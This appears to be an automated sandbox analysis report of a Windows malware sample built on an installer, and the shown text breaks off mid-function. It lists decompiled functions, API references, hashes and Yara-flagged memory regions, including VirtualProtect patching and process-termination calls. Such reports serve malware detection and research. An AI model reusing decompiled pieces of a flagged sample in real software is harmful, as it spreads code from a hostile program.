                                                                                                                                                                          0x72e4189e
                                                                                                                                                                          0x72e418a3
                                                                                                                                                                          0x72e418a3
                                                                                                                                                                          0x72e418a5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e418a5
                                                                                                                                                                          0x72e4187f
                                                                                                                                                                          0x72e41880
                                                                                                                                                                          0x72e41888
                                                                                                                                                                          0x72e41889
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41889
                                                                                                                                                                          0x72e41882
                                                                                                                                                                          0x72e41883
                                                                                                                                                                          0x72e41891
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41891
                                                                                                                                                                          0x72e41886
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41886

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 72E41BFF: GlobalFree.KERNEL32 ref: 72E41E74
                                                                                                                                                                            • Part of subcall function 72E41BFF: GlobalFree.KERNEL32 ref: 72E41E79
                                                                                                                                                                            • Part of subcall function 72E41BFF: GlobalFree.KERNEL32 ref: 72E41E7E
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 72E418C5
                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 72E4194B
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 72E41970
                                                                                                                                                                            • Part of subcall function 72E4243E: GlobalAlloc.KERNEL32(00000040,?), ref: 72E4246F
                                                                                                                                                                            • Part of subcall function 72E42810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,72E41896,00000000), ref: 72E428E0
                                                                                                                                                                            • Part of subcall function 72E41666: wsprintfW.USER32 ref: 72E41694
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.408336316.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.408319285.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408347758.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408359638.0000000072E46000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3962662361-3916222277
                                                                                                                                                                          • Opcode ID: 28c5a998450547096bcc2f690f8a4c15ba4de5d1f84565cff00877fccedd3c20
                                                                                                                                                                          • Instruction ID: 07220f56c36b95da08c7f9e34ceeba1a69ff9d338cc502919e0e1d3d3a0e8d6d
                                                                                                                                                                          • Opcode Fuzzy Hash: 28c5a998450547096bcc2f690f8a4c15ba4de5d1f84565cff00877fccedd3c20
                                                                                                                                                                          • Instruction Fuzzy Hash: 8341AE769002459BDF119F3CF884B9D3BACAB08358F24F469FE4A9E086DF749485CB60
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040605C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                                                                                                          0x00406062
                                                                                                                                                                          0x00406068
                                                                                                                                                                          0x00406069
                                                                                                                                                                          0x00406069
                                                                                                                                                                          0x0040606e
                                                                                                                                                                          0x0040606f
                                                                                                                                                                          0x00406072
                                                                                                                                                                          0x00406077
                                                                                                                                                                          0x0040607a
                                                                                                                                                                          0x00406084
                                                                                                                                                                          0x00406091
                                                                                                                                                                          0x00406095
                                                                                                                                                                          0x0040609d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004060a1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004060a3
                                                                                                                                                                          0x004060a3
                                                                                                                                                                          0x004060a3
                                                                                                                                                                          0x004060a6
                                                                                                                                                                          0x004060a9
                                                                                                                                                                          0x004060a9
                                                                                                                                                                          0x004060ac
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040607A
                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                          • API String ID: 1716503409-1968954121
                                                                                                                                                                          • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                          • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                                                                                                                          • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                          • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004020D8, Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                          			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x434fc0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                                                                          0x004020d8
                                                                                                                                                                          0x004020d8
                                                                                                                                                                          0x004020dd
                                                                                                                                                                          0x004020e4
                                                                                                                                                                          0x004021a3
                                                                                                                                                                          0x004022f1
                                                                                                                                                                          0x004022f1
                                                                                                                                                                          0x00402c2a
                                                                                                                                                                          0x00402c2d
                                                                                                                                                                          0x00402c39
                                                                                                                                                                          0x00402c39
                                                                                                                                                                          0x004020f3
                                                                                                                                                                          0x004020fd
                                                                                                                                                                          0x00402100
                                                                                                                                                                          0x00402110
                                                                                                                                                                          0x00402114
                                                                                                                                                                          0x0040211a
                                                                                                                                                                          0x0040211c
                                                                                                                                                                          0x0040211f
                                                                                                                                                                          0x0040219c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040219c
                                                                                                                                                                          0x00402121
                                                                                                                                                                          0x0040212c
                                                                                                                                                                          0x00402130
                                                                                                                                                                          0x00402170
                                                                                                                                                                          0x00402132
                                                                                                                                                                          0x00402135
                                                                                                                                                                          0x00402138
                                                                                                                                                                          0x00402164
                                                                                                                                                                          0x0040213a
                                                                                                                                                                          0x0040213d
                                                                                                                                                                          0x00402146
                                                                                                                                                                          0x00402148
                                                                                                                                                                          0x00402148
                                                                                                                                                                          0x00402146
                                                                                                                                                                          0x00402138
                                                                                                                                                                          0x00402178
                                                                                                                                                                          0x00402191
                                                                                                                                                                          0x00402191
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00402178
                                                                                                                                                                          0x00402103
                                                                                                                                                                          0x0040210b
                                                                                                                                                                          0x0040210e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                                                                            • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,00000000,00422A37,74E5EA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                            • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,00000000,00422A37,74E5EA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                            • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                            • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll), ref: 0040560C
                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 334405425-0
                                                                                                                                                                          • Opcode ID: f19c79c5fba68d9d0d2f2fda6ec06f6b63f6e40353c0f80915a645696cb571d2
                                                                                                                                                                          • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                                                                                                                                          • Opcode Fuzzy Hash: f19c79c5fba68d9d0d2f2fda6ec06f6b63f6e40353c0f80915a645696cb571d2
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00401B9B, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                                                          			E00401B9B(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				char* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x28));
				_t33 =  *0x40ce50; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E0040657A(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
						_t12 =  *0x40ce50; // 0x0
						 *_t34 = _t12;
						 *0x40ce50 = _t34;
					} else {
						if(_t33 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t33 + 4; // 0x4
							E0040653D(_t30, _t3);
							_push(_t33);
							 *0x40ce50 =  *_t33;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t33 == _t28) {
							break;
						}
						_t33 =  *_t33;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t33 == _t28) {
								break;
							} else {
								_t36 = _t33 + 4;
								_t32 = L"Call";
								E0040653D(_t32, _t33 + 4);
								_t22 =  *0x40ce50; // 0x0
								E0040653D(_t36, _t22 + 4);
								_t25 =  *0x40ce50; // 0x0
								_push(_t32);
								_push(_t25 + 4);
								E0040653D();
								L15:
								 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E0040657A(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405B9D();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}














                                                                                                                                                                          0x00401b9b
                                                                                                                                                                          0x00401b9b
                                                                                                                                                                          0x00401b9e
                                                                                                                                                                          0x00401ba6
                                                                                                                                                                          0x00401bef
                                                                                                                                                                          0x00401c1d
                                                                                                                                                                          0x00401c26
                                                                                                                                                                          0x00401c28
                                                                                                                                                                          0x00401c2c
                                                                                                                                                                          0x00401c31
                                                                                                                                                                          0x00401c36
                                                                                                                                                                          0x00401c38
                                                                                                                                                                          0x00401bf1
                                                                                                                                                                          0x00401bf3
                                                                                                                                                                          0x0040292e
                                                                                                                                                                          0x00401bf9
                                                                                                                                                                          0x00401bf9
                                                                                                                                                                          0x00401bfe
                                                                                                                                                                          0x00401c05
                                                                                                                                                                          0x00401c06
                                                                                                                                                                          0x00401c0b
                                                                                                                                                                          0x00401c0b
                                                                                                                                                                          0x00401bf3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00401ba8
                                                                                                                                                                          0x00401ba8
                                                                                                                                                                          0x00401ba8
                                                                                                                                                                          0x00401bab
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00401bb1
                                                                                                                                                                          0x00401bb5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00401bb7
                                                                                                                                                                          0x00401bb9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00401bbf
                                                                                                                                                                          0x00401bbf
                                                                                                                                                                          0x00401bc2
                                                                                                                                                                          0x00401bc9
                                                                                                                                                                          0x00401bce
                                                                                                                                                                          0x00401bd8
                                                                                                                                                                          0x00401bdd
                                                                                                                                                                          0x00401be2
                                                                                                                                                                          0x00401be6
                                                                                                                                                                          0x00402a94
                                                                                                                                                                          0x00402c2a
                                                                                                                                                                          0x00402c2d
                                                                                                                                                                          0x00402c33
                                                                                                                                                                          0x00402c33
                                                                                                                                                                          0x00401bb9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00401bb5
                                                                                                                                                                          0x0040238a
                                                                                                                                                                          0x00402397
                                                                                                                                                                          0x00402398
                                                                                                                                                                          0x0040239d
                                                                                                                                                                          0x0040239d
                                                                                                                                                                          0x00402c35
                                                                                                                                                                          0x00402c39

                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 00401C0B
                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                                                                                            • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                            • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$AllocFreelstrcatlstrlen
                                                                                                                                                                          • String ID: Call
                                                                                                                                                                          • API String ID: 3292104215-1824292864
                                                                                                                                                                          • Opcode ID: 55940fcef90c5b0ef7e6a204281bb5bf10b75474f0a7449e56d51b35397a3ed1
                                                                                                                                                                          • Instruction ID: 7c0f58a685d1fc6dd3685da305ee1819882fb4420ac17dc2787245939102450a
                                                                                                                                                                          • Opcode Fuzzy Hash: 55940fcef90c5b0ef7e6a204281bb5bf10b75474f0a7449e56d51b35397a3ed1
                                                                                                                                                                          • Instruction Fuzzy Hash: 1B21D872904210EBDB20AFA8EE84A5E73B4EB04715755063BF552F72D0D7B8AC414B9D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0294791B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02947BC0: NtAllocateVirtualMemory.NTDLL ref: 02947D3D
                                                                                                                                                                            • Part of subcall function 029479C2: CreateFileA.KERNELBASE(?), ref: 02947AC8
                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,CE79F4FB,?,02947C4C), ref: 02949135
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateCreateFileLibraryLoadMemoryVirtual
                                                                                                                                                                          • String ID: rjk
                                                                                                                                                                          • API String ID: 2281259287-2473719777
                                                                                                                                                                          • Opcode ID: 8d85a9e630197fc07bef00b18e4dd46ebe70cb5b9a7efc12ce9c9dd370024f87
                                                                                                                                                                          • Instruction ID: daea61f01b286c031be7cc5d9ad2577056bb732835ab4eff05d047872bdebb2b
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d85a9e630197fc07bef00b18e4dd46ebe70cb5b9a7efc12ce9c9dd370024f87
                                                                                                                                                                          • Instruction Fuzzy Hash: 5031D374A4034A9FEF34AE788DA9BDF3795AF49350F9481299C598B240DB348A418B41
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 029423A2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • TerminateProcess.KERNELBASE ref: 02947859
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessTerminate
                                                                                                                                                                          • String ID: z
                                                                                                                                                                          • API String ID: 560597551-1657960367
                                                                                                                                                                          • Opcode ID: 267fc3698f57db655641e2599ce52a450b9c2a6bd5972f6034b57f322965443c
                                                                                                                                                                          • Instruction ID: 170bf1877f5c8ecd8e6873faa465f3b274439c93ebec2ccd90157cd70baabe49
                                                                                                                                                                          • Opcode Fuzzy Hash: 267fc3698f57db655641e2599ce52a450b9c2a6bd5972f6034b57f322965443c
                                                                                                                                                                          • Instruction Fuzzy Hash: 63012638A053088BC7346F718545AFC7FA5AF80330F554B4CA5D65A590CE244185CF07
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 029423EE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • TerminateProcess.KERNELBASE ref: 02947859
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessTerminate
                                                                                                                                                                          • String ID: z
                                                                                                                                                                          • API String ID: 560597551-1657960367
                                                                                                                                                                          • Opcode ID: def627dcd7ffa7108e24c9137c3ffddfc7914cfe227c20043568d4e873350c7e
                                                                                                                                                                          • Instruction ID: f60b9504b25d1ae39f97a113e5d8dc1ddc365689a41ea83db61a8c9f2773c3d7
                                                                                                                                                                          • Opcode Fuzzy Hash: def627dcd7ffa7108e24c9137c3ffddfc7914cfe227c20043568d4e873350c7e
                                                                                                                                                                          • Instruction Fuzzy Hash: 64F02839604304CBD3212BB04846AEDBF796F82260F550A58E9EA67AA4D7649182CB43
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 029422A4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • TerminateProcess.KERNELBASE ref: 02947859
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessTerminate
                                                                                                                                                                          • String ID: z
                                                                                                                                                                          • API String ID: 560597551-1657960367
                                                                                                                                                                          • Opcode ID: 4d5cafb4bf89fa30e79cfcdf140b4a7f3d1eacba33ddbcce049dda5107bca2d7
                                                                                                                                                                          • Instruction ID: 55472b0d78e68ea857542317e2e42dbb73d6be3067de9b7860dbffbbfe4e48ca
                                                                                                                                                                          • Opcode Fuzzy Hash: 4d5cafb4bf89fa30e79cfcdf140b4a7f3d1eacba33ddbcce049dda5107bca2d7
                                                                                                                                                                          • Instruction Fuzzy Hash: 44F06D79A083088BD7646F708886BFDBBF47F81354F560808D9CA6B621D728C191CF02
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 72E42A7F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x72e45048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x72e4505c, 4, 0x40, 0x72e4504c); // executed
					 *0x72e4505c = 0xc2;
					 *0x72e4504c = 0;
					 *0x72e45054 = 0;
					 *0x72e45068 = 0;
					 *0x72e45058 = 0;
					 *0x72e45050 = 0;
					 *0x72e45060 = 0;
					 *0x72e4505e = 0;
				}
				return 1;
			}



                                                                                                                                                                          0x72e42a88
                                                                                                                                                                          0x72e42a8d
                                                                                                                                                                          0x72e42a9d
                                                                                                                                                                          0x72e42aa5
                                                                                                                                                                          0x72e42aac
                                                                                                                                                                          0x72e42ab1
                                                                                                                                                                          0x72e42ab6
                                                                                                                                                                          0x72e42abb
                                                                                                                                                                          0x72e42ac0
                                                                                                                                                                          0x72e42ac5
                                                                                                                                                                          0x72e42aca
                                                                                                                                                                          0x72e42aca
                                                                                                                                                                          0x72e42ad2

                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualProtect.KERNELBASE(72E4505C,00000004,00000040,72E4504C), ref: 72E42A9D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.408336316.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.408319285.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408347758.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408359638.0000000072E46000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                          • String ID: `gt@Mt
                                                                                                                                                                          • API String ID: 544645111-3350092837
                                                                                                                                                                          • Opcode ID: 749020ccde973b922967cf8557750805924c1e0e18905f4e1899936d0ad01f8c
                                                                                                                                                                          • Instruction ID: b96dc18bc09c3c11f58d73ac90d966835dfb59b22a98d2c4560771c580e8acd2
                                                                                                                                                                          • Opcode Fuzzy Hash: 749020ccde973b922967cf8557750805924c1e0e18905f4e1899936d0ad01f8c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4EF0A5BE680285DED361CF2B84447093BE8B769304BA48E2EFD88D6240E77464C6DB91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004015C1, Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                          			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
